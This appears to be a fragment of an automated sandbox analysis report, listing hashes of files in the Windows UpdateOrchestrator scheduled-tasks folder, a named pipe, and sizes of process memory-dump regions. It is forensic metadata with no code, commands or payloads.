C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/316-171-0x000001EC4B440000-0x000001EC4B46B000-memory.dmpFilesize
172KB
-
memory/316-172-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmpFilesize
64KB
-
memory/316-165-0x000001EC4B440000-0x000001EC4B46B000-memory.dmpFilesize
172KB
-
memory/388-176-0x0000022E61060000-0x0000022E6108B000-memory.dmpFilesize
172KB
-
memory/548-102-0x0000000007330000-0x00000000073A6000-memory.dmpFilesize
472KB
-
memory/548-97-0x0000000007140000-0x0000000007184000-memory.dmpFilesize
272KB
-
memory/608-138-0x00000220B0110000-0x00000220B013B000-memory.dmpFilesize
172KB
-
memory/608-131-0x00000220B0110000-0x00000220B013B000-memory.dmpFilesize
172KB
-
memory/608-130-0x00000220B00E0000-0x00000220B0105000-memory.dmpFilesize
148KB
-
memory/608-139-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmpFilesize
64KB
-
memory/608-132-0x00000220B0110000-0x00000220B013B000-memory.dmpFilesize
172KB
-
memory/664-150-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmpFilesize
64KB
-
memory/664-149-0x0000026203F40000-0x0000026203F6B000-memory.dmpFilesize
172KB
-
memory/664-143-0x0000026203F40000-0x0000026203F6B000-memory.dmpFilesize
172KB
-
memory/948-161-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmpFilesize
64KB
-
memory/948-154-0x0000028FD3800000-0x0000028FD382B000-memory.dmpFilesize
172KB
-
memory/948-160-0x0000028FD3800000-0x0000028FD382B000-memory.dmpFilesize
172KB
-
memory/2028-116-0x00007FF977DA0000-0x00007FF977E5E000-memory.dmpFilesize
760KB
-
memory/2028-115-0x00007FF978050000-0x00007FF978245000-memory.dmpFilesize
2.0MB
-
memory/2028-104-0x00000204D5400000-0x00000204D5422000-memory.dmpFilesize
136KB
-
memory/2028-114-0x00000204D5550000-0x00000204D557A000-memory.dmpFilesize
168KB
-
memory/2572-19-0x00000000060A0000-0x00000000060EC000-memory.dmpFilesize
304KB
-
memory/2572-5-0x00000000051A0000-0x00000000051C2000-memory.dmpFilesize
136KB
-
memory/2572-21-0x00000000071E0000-0x00000000071FA000-memory.dmpFilesize
104KB
-
memory/2572-81-0x00000000744B0000-0x0000000074C60000-memory.dmpFilesize
7.7MB
-
memory/2572-22-0x0000000002A80000-0x0000000002A88000-memory.dmpFilesize
32KB
-
memory/2572-18-0x0000000006050000-0x000000000606E000-memory.dmpFilesize
120KB
-
memory/2572-17-0x0000000005C90000-0x0000000005FE4000-memory.dmpFilesize
3.3MB
-
memory/2572-7-0x0000000005B10000-0x0000000005B76000-memory.dmpFilesize
408KB
-
memory/2572-6-0x00000000059F0000-0x0000000005A56000-memory.dmpFilesize
408KB
-
memory/2572-20-0x0000000007820000-0x0000000007E9A000-memory.dmpFilesize
6.5MB
-
memory/2572-23-0x0000000007270000-0x00000000072D2000-memory.dmpFilesize
392KB
-
memory/2572-24-0x0000000009450000-0x00000000099F4000-memory.dmpFilesize
5.6MB
-
memory/2572-0-0x00000000744BE000-0x00000000744BF000-memory.dmpFilesize
4KB
-
memory/2572-4-0x00000000744B0000-0x0000000074C60000-memory.dmpFilesize
7.7MB
-
memory/2572-3-0x00000000744B0000-0x0000000074C60000-memory.dmpFilesize
7.7MB
-
memory/2572-2-0x0000000005350000-0x0000000005978000-memory.dmpFilesize
6.2MB
-
memory/2572-1-0x0000000004B80000-0x0000000004BB6000-memory.dmpFilesize
216KB
-
memory/3384-37-0x00000000744B0000-0x0000000074C60000-memory.dmpFilesize
7.7MB
-
memory/3384-50-0x0000000006CE0000-0x0000000006CFE000-memory.dmpFilesize
120KB
-
memory/3384-26-0x00000000744B0000-0x0000000074C60000-memory.dmpFilesize
7.7MB
-
memory/3384-36-0x00000000744B0000-0x0000000074C60000-memory.dmpFilesize
7.7MB
-
memory/3384-38-0x0000000006D00000-0x0000000006D32000-memory.dmpFilesize
200KB
-
memory/3384-51-0x0000000006D50000-0x0000000006DF3000-memory.dmpFilesize
652KB
-
memory/3384-52-0x00000000744B0000-0x0000000074C60000-memory.dmpFilesize
7.7MB
-
memory/3384-49-0x00000000744B0000-0x0000000074C60000-memory.dmpFilesize
7.7MB
-
memory/3384-39-0x00000000702D0000-0x000000007031C000-memory.dmpFilesize
304KB
-
memory/3384-53-0x0000000006F10000-0x0000000006F1A000-memory.dmpFilesize
40KB
-
memory/3384-59-0x00000000744B0000-0x0000000074C60000-memory.dmpFilesize
7.7MB
-
memory/3384-56-0x00000000744B0000-0x0000000074C60000-memory.dmpFilesize
7.7MB
-
memory/3384-55-0x00000000070B0000-0x00000000070C1000-memory.dmpFilesize
68KB
-
memory/3384-54-0x0000000007140000-0x00000000071D6000-memory.dmpFilesize
600KB
-
memory/3964-79-0x0000000006E80000-0x0000000006EEC000-memory.dmpFilesize
432KB
-
memory/3964-80-0x0000000006FB0000-0x0000000007042000-memory.dmpFilesize
584KB
-
memory/3964-82-0x0000000004930000-0x0000000004942000-memory.dmpFilesize
72KB
-
memory/3964-83-0x0000000007250000-0x000000000728C000-memory.dmpFilesize
240KB
-
memory/3984-119-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3984-117-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3984-118-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3984-120-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3984-126-0x00007FF977DA0000-0x00007FF977E5E000-memory.dmpFilesize
760KB
-
memory/3984-125-0x00007FF978050000-0x00007FF978245000-memory.dmpFilesize
2.0MB
-
memory/3984-122-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3984-127-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB